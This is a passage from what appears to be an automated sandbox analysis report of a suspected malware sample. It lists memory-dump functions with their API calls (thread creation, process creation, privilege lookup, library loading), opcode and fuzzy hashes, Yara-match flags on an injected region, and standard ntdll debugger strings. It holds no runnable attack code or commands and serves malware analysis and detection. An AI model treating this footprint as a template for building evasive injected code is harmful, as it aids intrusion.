                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 1bc211bb3bc315b92afbc4e8e74e1e7ad24c81bd7bd41f88d4b13927011dd61d
                                                        • Instruction ID: 05727da2c9cbf014ac83d812c8ad352fb6f8632e1d35107180c04089ac526ba7
                                                        • Opcode Fuzzy Hash: 1bc211bb3bc315b92afbc4e8e74e1e7ad24c81bd7bd41f88d4b13927011dd61d
                                                        • Instruction Fuzzy Hash: 5F90027120100902F180715B440466A004597D2385F91C515A501A764DCA55DA5D77E1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048D9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 28e895958e08b8308167d5691eb4a726f1214b22351b72c8a52b1465c67470a9
                                                        • Instruction ID: 9377580b284b0f0e0ed4f0968baa749651284d0956af0b56f7295b2187341f53
                                                        • Opcode Fuzzy Hash: 28e895958e08b8308167d5691eb4a726f1214b22351b72c8a52b1465c67470a9
                                                        • Instruction Fuzzy Hash: FC90026921300102F180715B540862A004597D2286F91D915A500A668CC955D86D6361
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048D9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: b31cc6201b2fbc00dd2e8f375f6d94fe6231143f18b677c1054c349749e7339f
                                                        • Instruction ID: df41897dd0bceeba36b32615a74f1090606cc8fefbfff74e1f6b6df518388c63
                                                        • Opcode Fuzzy Hash: b31cc6201b2fbc00dd2e8f375f6d94fe6231143f18b677c1054c349749e7339f
                                                        • Instruction Fuzzy Hash: F290027131114502F110615B8404726004597D2285F51C911A5819668D86D5D8997162
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048D9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 60de780bda4443ec091c67a4db0c3c0ebbb15340286a5793e203744b564ad7ef
                                                        • Instruction ID: 0fdc2d752099509da0601e25db61fe53fff8132a883b03376f4d902ef0985b25
                                                        • Opcode Fuzzy Hash: 60de780bda4443ec091c67a4db0c3c0ebbb15340286a5793e203744b564ad7ef
                                                        • Instruction Fuzzy Hash: A490027120100502F100659B5408666004597E1385F51D511AA019665EC6A5D8997171
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048D9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: c2a76809c7481d9f489be470ac176548d0f6125d053e27732e81ab14c6555f0c
                                                        • Instruction ID: a2240f83a4c1472a53d64187a94fc2e35b2e302d9e1135b5634350f27297d79c
                                                        • Opcode Fuzzy Hash: c2a76809c7481d9f489be470ac176548d0f6125d053e27732e81ab14c6555f0c
                                                        • Instruction Fuzzy Hash: 07900261242042527545B15B44045274046A7E12C5791C512A6409A60C8566E85EE661
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048D9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 0824d9c679d49d8a807f6d91ec22b95054bdde286a1d253b3624333ab7106ab3
                                                        • Instruction ID: c83ce02cc29ee6d0b51d798a8661954ad5eb988e6a01ae22bce2e910a91d009c
                                                        • Opcode Fuzzy Hash: 0824d9c679d49d8a807f6d91ec22b95054bdde286a1d253b3624333ab7106ab3
                                                        • Instruction Fuzzy Hash: F490027120100513F111615B4504727004997D12C5F91C912A5419668D9696D95AB161
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048D99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 78c7852cdd75080c243843d6e1f409679f94db50b52b7bf4921a4b7b8850520d
                                                        • Instruction ID: a9ff438834ad3038712fcece7b7daf98a20d914c538e2519b055ac7cd01a66c5
                                                        • Opcode Fuzzy Hash: 78c7852cdd75080c243843d6e1f409679f94db50b52b7bf4921a4b7b8850520d
                                                        • Instruction Fuzzy Hash: 029002A134100542F100615B4414B260045D7E2385F51C515E6059664D8659DC5A7166
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048D9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 28f59990bd1be981f445a2234f7d858de13b5a81a105f2d11cd356452b47a351
                                                        • Instruction ID: 8714eca6a6f1fdf2241c85547c932a6b3b33f8ca5db3101ff52737483bd08a03
                                                        • Opcode Fuzzy Hash: 28f59990bd1be981f445a2234f7d858de13b5a81a105f2d11cd356452b47a351
                                                        • Instruction Fuzzy Hash: E49002B120100502F140715B4404766004597D1385F51C511AA059664E8699DDDD76A5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048D9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 9f09ced332eda2b3de166346a6056b79d60bb1dc19e7cf2134de612b2ddb035b
                                                        • Instruction ID: 41e33eec125d57570fcc8603745a83984d979d4584ac879052c01b7f6a840f9b
                                                        • Opcode Fuzzy Hash: 9f09ced332eda2b3de166346a6056b79d60bb1dc19e7cf2134de612b2ddb035b
                                                        • Instruction Fuzzy Hash: 8E90026121180142F200656B4C14B27004597D1387F51C615A5149664CC955D8696561
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 031C8C40, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Sleep.KERNELBASE(000007D0), ref: 031C8CE8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925530735.00000000031B0000.00000040.00000001.sdmp, Offset: 031B0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Sleep
                                                        • String ID: net.dll$wininet.dll
                                                        • API String ID: 3472027048-1269752229
                                                        • Opcode ID: 6ba6e2193b7375724587143848d6886317518ac4e558dc9da06e331420d8dba5
                                                        • Instruction ID: 9a038f841d019d4df871e8f6931819242ae98f99a5f0fe4d40fb67c261b69178
                                                        • Opcode Fuzzy Hash: 6ba6e2193b7375724587143848d6886317518ac4e558dc9da06e331420d8dba5
                                                        • Instruction Fuzzy Hash: 7E3170B6500784BBC724DF65D8C5FA7B7F8BB98700F04851DE6299B241D770A550CBA8
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 031C8C38, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 80sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Sleep.KERNELBASE(000007D0), ref: 031C8CE8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925530735.00000000031B0000.00000040.00000001.sdmp, Offset: 031B0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Sleep
                                                        • String ID: net.dll$wininet.dll
                                                        • API String ID: 3472027048-1269752229
                                                        • Opcode ID: 533e606e50bc10ee241dfc84ebeac705a3771323fcdfbd4d2902f5f1f6421d70
                                                        • Instruction ID: 861a7e092a394bb4286da61791821ae20c0efc4143c3e7c166ee7bfb2d940d79
                                                        • Opcode Fuzzy Hash: 533e606e50bc10ee241dfc84ebeac705a3771323fcdfbd4d2902f5f1f6421d70
                                                        • Instruction Fuzzy Hash: 9621D0B6500388BBC724DF69CCC5FABB7B8BF58700F04811DE629AB281D770A550CBA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 031CA222, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,031B3AF8), ref: 031CA25D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925530735.00000000031B0000.00000040.00000001.sdmp, Offset: 031B0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FreeHeap
                                                        • String ID: .z`
                                                        • API String ID: 3298025750-1441809116
                                                        • Opcode ID: 2f18dc23ee13a63acd03afe6d0b90ced8b0262d88b4a61ab5001b7cd91c5737a
                                                        • Instruction ID: c168da24ad89216bdb1ebc4b9d6a79ecdbe02edb298cdaea6970f5ac8f243c44
                                                        • Opcode Fuzzy Hash: 2f18dc23ee13a63acd03afe6d0b90ced8b0262d88b4a61ab5001b7cd91c5737a
                                                        • Instruction Fuzzy Hash: 79E068B82043C60FD711EF78A8C08A77B91EF82304314494ED8C84B607C230D92ACBB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 031CA230, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,031B3AF8), ref: 031CA25D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925530735.00000000031B0000.00000040.00000001.sdmp, Offset: 031B0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FreeHeap
                                                        • String ID: .z`
                                                        • API String ID: 3298025750-1441809116
                                                        • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                        • Instruction ID: ed4383660dcef62e4ba8a51810bb829c8dc1fc6c5279906f12474ffa3e5f9638
                                                        • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                        • Instruction Fuzzy Hash: 7FE012B5210208ABDB18EF99DC48EA777ADAF88650F018659BA085B241C630E9108AB0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 031B82E8, Relevance: 3.1, APIs: 2, Instructions: 58threadwindowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 031B834A
                                                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 031B836B
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925530735.00000000031B0000.00000040.00000001.sdmp, Offset: 031B0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MessagePostThread
                                                        • String ID:
                                                        • API String ID: 1836367815-0
                                                        • Opcode ID: 13797d424ed8e25572e3af0f95b367de7bfd4a9376ca64163d991277a74b46ef
                                                        • Instruction ID: b6872b85ee96d77fa6efa45c39e2f62c9e688e2cd58c5c9006891b66af1a6e54
                                                        • Opcode Fuzzy Hash: 13797d424ed8e25572e3af0f95b367de7bfd4a9376ca64163d991277a74b46ef
                                                        • Instruction Fuzzy Hash: 2A01DD31A903187BEB21E6949C42FFF776C9F58B50F150119FB08BE1C1E794690646F1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 031B82F0, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 031B834A
                                                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 031B836B
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925530735.00000000031B0000.00000040.00000001.sdmp, Offset: 031B0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MessagePostThread
                                                        • String ID:
                                                        • API String ID: 1836367815-0
                                                        • Opcode ID: 29a892fc29f7ae1cc7dcf0d9980a4ef5a3648e613fbd5d957af854e8297cf94a
                                                        • Instruction ID: 1231c9c7a4881b509698427e2cf113f2d343672253ef6adb52815352ec235c7f
                                                        • Opcode Fuzzy Hash: 29a892fc29f7ae1cc7dcf0d9980a4ef5a3648e613fbd5d957af854e8297cf94a
                                                        • Instruction Fuzzy Hash: A7018F35A903287BE721E6949C02FFE776C6B48A50F054118FB08BE1C1E794A90646F6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 031B82B3, Relevance: 3.1, APIs: 2, Instructions: 54threadwindowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 031B834A
                                                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 031B836B
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925530735.00000000031B0000.00000040.00000001.sdmp, Offset: 031B0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MessagePostThread
                                                        • String ID:
                                                        • API String ID: 1836367815-0
                                                        • Opcode ID: d5aebd5b5c1868807de472c6790a97925c08e29940f2f5be6745438aa01ba458
                                                        • Instruction ID: 97a18ac90220f6bfefedec79074d8eb7fee99adb5279cd993cb751786e31643a
                                                        • Opcode Fuzzy Hash: d5aebd5b5c1868807de472c6790a97925c08e29940f2f5be6745438aa01ba458
                                                        • Instruction Fuzzy Hash: 53014E3664535937D621E2782C02FFA631C5B15E15F15015AFE08EE1D1E795D50541F1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 031BACC0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 031BAD32
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925530735.00000000031B0000.00000040.00000001.sdmp, Offset: 031B0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Load
                                                        • String ID:
                                                        • API String ID: 2234796835-0
                                                        • Opcode ID: 4e7e6ba31bbc1c6f731b244d46290ada3a087f6c5bf953407071256f7589dc13
                                                        • Instruction ID: 3c00664dde5bb79e05dcd97a6b3c30e8eb482d21da09eaf586b62628b9698dbb
                                                        • Opcode Fuzzy Hash: 4e7e6ba31bbc1c6f731b244d46290ada3a087f6c5bf953407071256f7589dc13
                                                        • Instruction Fuzzy Hash: 620112B9D5020DA7DB10DAE4DC41FDDB7B89F58604F044595E9089B140F731EB15CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 031CA2A0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 031CA2F4
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925530735.00000000031B0000.00000040.00000001.sdmp, Offset: 031B0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateInternalProcess
                                                        • String ID:
                                                        • API String ID: 2186235152-0
                                                        • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                        • Instruction ID: 7a105008336c44da942c32d608fcf145188049223906fecc44e0918399dd8b23
                                                        • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                        • Instruction Fuzzy Hash: 0A01AFB2210208ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97240C630E851CBA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 031C8D70, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,031BF010,?,?,00000000), ref: 031C8DAC
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925530735.00000000031B0000.00000040.00000001.sdmp, Offset: 031B0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateThread
                                                        • String ID:
                                                        • API String ID: 2422867632-0
                                                        • Opcode ID: d169ca5958798c9a150e3ccb242ea2b567fcd8f48183a47e691f32fb9aa8ae05
                                                        • Instruction ID: 6ac0db18e4b0eab2b5087c48333c5495dbe989cfafbece93ce7d625029499196
                                                        • Opcode Fuzzy Hash: d169ca5958798c9a150e3ccb242ea2b567fcd8f48183a47e691f32fb9aa8ae05
                                                        • Instruction Fuzzy Hash: E5E092373A03043BE730A599AC02FE7B39CCBA5B21F55002AFA4DEB6C1DA95F40142A4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 031CA383, Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,031BF192,031BF192,?,00000000,?,?), ref: 031CA3C0
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925530735.00000000031B0000.00000040.00000001.sdmp, Offset: 031B0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        • Opcode ID: fd171f6612198f3179f52ce446ae4ec9654bb5e48b1c37696abb20ed46dcc0dd
                                                        • Instruction ID: b96555fe84dfb7751ed6a4a4e1525f3f3f04a42ee03ed0909c31084ea9b17015
                                                        • Opcode Fuzzy Hash: fd171f6612198f3179f52ce446ae4ec9654bb5e48b1c37696abb20ed46dcc0dd
                                                        • Instruction Fuzzy Hash: 7EE0E5B5118A802BE711DB19DC84F977F94CF8A220F04C59DED881F102C534A804C7B0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 031CA390, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,031BF192,031BF192,?,00000000,?,?), ref: 031CA3C0
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925530735.00000000031B0000.00000040.00000001.sdmp, Offset: 031B0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                        • Instruction ID: c12e22d92a9a85d3042ab556871b0501de3769b9d07606feda0c8728e51dd6a5
                                                        • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                        • Instruction Fuzzy Hash: 43E01AB52102086BDB10DF49DC84FE737ADAF88650F018155BA085B241CA30E8108BF5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 031CA1F0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(031C44F6,?,031C4C6F,031C4C6F,?,031C44F6,?,?,?,?,?,00000000,00000000,?), ref: 031CA21D
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925530735.00000000031B0000.00000040.00000001.sdmp, Offset: 031B0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                        • Instruction ID: edf709270b9ad72af782cf23a33d36c7f6028478c399a676d1043312e8d70fe9
                                                        • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                        • Instruction Fuzzy Hash: 25E012B5210208ABDB14EF99DC40EA777ADAF88650F118559BA085B241C630F9108BB0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 031BF690, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetErrorMode.KERNELBASE(00008003,?,031B8CF4,?), ref: 031BF6BB
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925530735.00000000031B0000.00000040.00000001.sdmp, Offset: 031B0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorMode
                                                        • String ID:
                                                        • API String ID: 2340568224-0
                                                        • Opcode ID: 7ea49bcfd7eb89cfce1dd1d38e7dcc5e35a49d50de701d0c82c68256bf4518e3
                                                        • Instruction ID: 51d41c6a001e208da5513482951c082f376e0f357a1cb01a975bf3bf364edb78
                                                        • Opcode Fuzzy Hash: 7ea49bcfd7eb89cfce1dd1d38e7dcc5e35a49d50de701d0c82c68256bf4518e3
                                                        • Instruction Fuzzy Hash: D9D05E766903082BE610EAA59C03F6673985B58A00F490064F948DA2C3DA54E4114165
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 031CA3C5, Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,031BF192,031BF192,?,00000000,?,?), ref: 031CA3C0
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925530735.00000000031B0000.00000040.00000001.sdmp, Offset: 031B0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        • Opcode ID: 74aa864b63d167c4d3501b3b175f067a5d55d8883e1ac6d785d3a7e7fe6958f6
                                                        • Instruction ID: 129f85f38de39892e5da7113094198f00c75e098dd0371bda82fc448aca057dc
                                                        • Opcode Fuzzy Hash: 74aa864b63d167c4d3501b3b175f067a5d55d8883e1ac6d785d3a7e7fe6958f6
                                                        • Instruction Fuzzy Hash: D5D0C9B5214248AFD705DF58E8608A77369AFC8215715865AFC8983206D231DD25CAB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048D967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 148e08a68bebf0b0e0bead0bf67b4aba92424c511df72574156a4b428409e078
                                                        • Instruction ID: b73bbd7791ee18d0a3388a0b6ce537418db04e2efcb660d63d73f6ad5c3aa82f
                                                        • Opcode Fuzzy Hash: 148e08a68bebf0b0e0bead0bf67b4aba92424c511df72574156a4b428409e078
                                                        • Instruction Fuzzy Hash: 99B02BB19020C1C5F700D7710A087373A0077C0340F13C511D2024340A0338D084F2B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Function 0494B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • *** enter .cxr %p for the context, xrefs: 0494B50D
                                                        • *** An Access Violation occurred in %ws:%s, xrefs: 0494B48F
                                                        • <unknown>, xrefs: 0494B27E, 0494B2D1, 0494B350, 0494B399, 0494B417, 0494B48E
                                                        • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0494B484
                                                        • an invalid address, %p, xrefs: 0494B4CF
                                                        • write to, xrefs: 0494B4A6
                                                        • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0494B53F
                                                        • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0494B38F
                                                        • The critical section is owned by thread %p., xrefs: 0494B3B9
                                                        • a NULL pointer, xrefs: 0494B4E0
                                                        • Go determine why that thread has not released the critical section., xrefs: 0494B3C5
                                                        • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0494B305
                                                        • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0494B47D
                                                        • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0494B3D6
                                                        • read from, xrefs: 0494B4AD, 0494B4B2
                                                        • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0494B314
                                                        • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0494B2F3
                                                        • The instruction at %p tried to %s , xrefs: 0494B4B6
                                                        • *** then kb to get the faulting stack, xrefs: 0494B51C
                                                        • The resource is owned exclusively by thread %p, xrefs: 0494B374
                                                        • *** Resource timeout (%p) in %ws:%s, xrefs: 0494B352
                                                        • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0494B323
                                                        • This failed because of error %Ix., xrefs: 0494B446
                                                        • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0494B2DC
                                                        • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0494B476
                                                        • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0494B39B
                                                        • The resource is owned shared by %d threads, xrefs: 0494B37E
                                                        • *** Inpage error in %ws:%s, xrefs: 0494B418
                                                        • *** enter .exr %p for the exception record, xrefs: 0494B4F1
                                                        • The instruction at %p referenced memory at %p., xrefs: 0494B432
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
